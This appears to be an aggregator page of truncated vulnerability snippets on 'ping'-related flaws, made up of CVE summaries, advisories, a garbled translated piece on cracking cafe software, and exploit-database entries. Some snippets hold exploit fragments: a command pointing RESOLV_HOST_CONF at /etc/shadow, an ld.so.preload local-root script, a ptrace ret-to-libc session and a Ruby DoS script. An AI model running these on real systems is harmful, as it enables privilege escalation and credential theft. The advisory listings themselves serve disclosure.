CVE-2006-5272

Stack-based buffer overflow in McAfee ePolicy Orchestrator 3.5 through 3.6.1, ProtectionPilot 1.1.1 and 1.5, and Common Management Agent CMA 3.6.0.453 and earlier allows remote attackers to execute arbitrary code via a crafted ping packet...

CVE-2006-5272

Stack-based buffer overflow in McAfee ePolicy Orchestrator 3.5 through 3.6.1, ProtectionPilot 1.1.1 and 1.5, and Common Management Agent CMA 3.6.0.453 and earlier allows remote attackers to execute arbitrary code via a crafted ping packet...

Fujitsu-Siemens ServerView code execution

Shell characters filtering problem in Web interface "ping" CGI script...

[Full-disclosure] Yoggie Pico Pro Remote Code Execution

This vulnerability affects the Yoggie Pico Pro and most certainly the Yoggie Pico, due to them being effectively identical security appliance. They expose a 'ping' function in their web interface for diagnostic purposes, which passes the IP/hostname given directly to ping in the form of 'ping -c ...

Hack tips of the hands to teach you to easily crack the cafe! - Vulnerability warning-the black bar safety net

Crack Vientiane secrets A with Alt+Ctrl+Del key combination（Vientiane） After the boot, when appears the blue background, immediately press the key combination, pop-up“close Program”dialog box, if inside there is“client”after the immediately closed, when the discovery of“ | --- Unknown”program is...

Design/Logic Flaw

Cerulean Studios Trillian Pro before 3.1.5.1 allows remote attackers to obtain potentially sensitive information via long CTCP PING messages that contain UTF-8 characters, which generates a malformed response that is not truncated by a newline, which can cause portions of a server message to be...

CVE-2007-2479

Cerulean Studios Trillian Pro before 3.1.5.1 allows remote attackers to obtain potentially sensitive information via long CTCP PING messages that contain UTF-8 characters, which generates a malformed response that is not truncated by a newline, which can cause portions of a server message to be...

CVE-2007-2479

Cerulean Studios Trillian Pro before 3.1.5.1 allows remote attackers to obtain potentially sensitive information via long CTCP PING messages that contain UTF-8 characters, which generates a malformed response that is not truncated by a newline, which can cause portions of a server message to be...

iDefense Security Advisory 04.30.07: Cerulean Studios Trillian Multiple IRC Vulnerabilities

Cerulean Studios Trillian Multiple IRC Vulnerabilities iDefense Security Advisory 04.30.07 http://labs.idefense.com/intelligence/vulnerabilities/ Apr 30, 2007 I. BACKGROUND Cerulean Studios Trillian is a multi-protocol chat application that supports IRC, ICQ, AIM and MSN protocols. More informati...

Destroy TCP/IP-vulnerabilities and early warning-the black bar safety net

The use of a TCP/IP Protocol software vulnerabilities to attack the classic example is the Ping of Death attack. The use of a specific method is,your opponent create a exceeds the IP Standard's maximum length--6 5 5 3 5 bytes of the IP packet. When this"puffy"data packet arrival time,it makes the...

C-Arbre <= 0.6PR7 (root_path) Remote File Inclusion Vulnerability

Exploit for unknown platform in category web applications ================================================================= C-Arbre = 0.6PR7 rootpath Remote File Inclusion Vulnerability ================================================================= \ /\ \ / | \ \ | / \ // / | \ | \ \ Y / |...

ptrace suids local root.txt

bash-2.05a$ uname -a QNX muh 6.3.2 2006/03/16-14:19:50EST x86pc x86 bash-2.05a$ gdb -q /usr/bin/ping we use some ret-to-libc-type-shellcode gdb p system $1 = text variable, no debug info 0xb031897c system gdb p exit $2 = text variable, no debug info 0xb0321ff8 exit gdb q bash-2.05a$ export...

Colloquy 2.1.3545 - INVITE Format String Denial of Service

Colloquy 2.1.3545 - INVITE Format String Denial of Service !/usr/bin/ruby c Copyright 2006 Lance M. Havok Makes use of the Colloquy INVITE format string vulnerability. require 'socket' targetchannel = ARGV0 || "whatever" targetserver = ARGV1 || "irc.server.org" targetport = ARGV2 || 6667 randnick...

Colloquy 2.1.3545 - &#039;INVITE&#039; Format String Denial of Service

!/usr/bin/ruby c Copyright 2006 Lance M. Havok Makes use of the Colloquy INVITE format string vulnerability. require 'socket' targetchannel = ARGV0 || "whatever" targetserver = ARGV1 || "irc.server.org" targetport = ARGV2 || 6667 randnick = "spongebo" channeljoined = false readytogo = false...

CVE-2006-6266

Teredo clients, when following item 6 of RFC4380 section 5.2.3, start direct IPv6 connectivity tests aka ping tests in response to packets from non-Teredo source addresses, which might allow remote attackers to induce Teredo clients to send packets to third parties...

CVE-2006-6266

CVE-2006-6266 concerns Teredo clients: when following RFC4380-5.2.3 item 6, Teredo clients initiate direct IPv6 connectivity (ping) tests in response to non-Teredo source addresses, potentially causing affected clients to send packets to third parties. The provided documents describe the behavior...

Resolv+ (RESOLV_HOST_CONF) Linux Library Local Exploit

No description provided by source. setenv RESOLVHOSTCONF /etc/shadow; ping adfas...

AIX 3.x/4.x / Windows 95/98/2000/NT 4.0 / SunOS 5 - &#039;gethostbyname()&#039; Remote Buffer Overflow

source: https://www.securityfocus.com/bid/6853/info A vulnerability has been discovered in multiple vendor implementations of the 'gethostbyname' library function, which is used to resolve network addresses. The 'gethostbyname' function fails to implement sufficient bounds checking on data copied...

MSSQL Ping Utility

This module simply queries the MSSQL Browser service for server information. This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'MSSQL Ping Utility', 'Description' = 'This module simply queries the...

liblesstif 2-0.93.94-4mdk - &#039;DEBUG_FILE&#039; Local Privilege Escalation

!/bin/sh echo echo "mtink libXm local root exploit" echo " [email protected] " echo umask 000 export DEBUGFILE="/etc/ld.so.preload" cat /tmp/lib.c void initvoid if getuid!=0 && geteuid==0 setuid0; unlink"/etc/ld.so.preload"; execl"/bin/bash", "bash", 0; EOF /usr/bin/gcc -o /tmp/lib.o -c /tmp/lib.c...